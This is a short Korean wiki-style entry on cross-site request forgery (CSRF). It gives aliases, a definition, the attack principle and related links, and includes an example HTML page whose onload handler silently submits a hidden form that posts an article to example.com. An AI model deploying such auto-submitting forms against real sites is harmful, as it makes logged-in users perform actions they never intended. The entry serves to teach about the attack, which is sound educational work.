CSRF

1 개요

cross-site request forgery, one-click attack, session riding, CSRF, XSRF

사이트 간 요청 위조, 크로스 사이트 요청 위조

• 의도하지 않게 게시판에 글을 작성하거나, 쇼핑을 하게 하는 등의 공격
• 인증된 사용자로 하여금 공격자가 원하는 명령을 대신 수행하게 하는 공격
• 사용자가 자신의 의지와는 무관하게 공격자가 의도한 행위(수정, 삭제, 등록 등)를 특정 웹사이트에 요청하게 하는 공격
• XSS에 취약하면 공격이 용이함

2 원리

• 공격자가 공격용 웹페이지를 작성하여 공개
• 제3자가 공격용 웹페이지 접속
• 제3자는 임의의 HTTP요청(공격)을 송신한당 꺄르르르륶!!!!

3 예시

<!DOCTYPE html>
<html lang="ko">
<head>
  <title>공격용 웹페이지</title>
</head>
<body onload="document.attackform.submit();">
<form name="attackform" method="post" action="http://example.com/bbs/register.cgi">
  <input type="hidden" name="title" value="제목">
  <input type="hidden" name="article" value="본문">
  <input type="submit" value="제출">
</form>
</body>
</html>

→ 웹페이지가 로드되면(onload) 의도하지 않게 example.com에 글을 남기도록 폼 내용을 제출하게 됨

4 같이 보기

• 크로스 사이트 스크립팅 (XSS)
• 웹 애플리케이션 보안
• 자바스크립트 onload
• 동일 오리진 정책
• OWASP
• 라라벨 CSRF 방지

5 참고

• 영어 위키백과 "Cross site request forgery"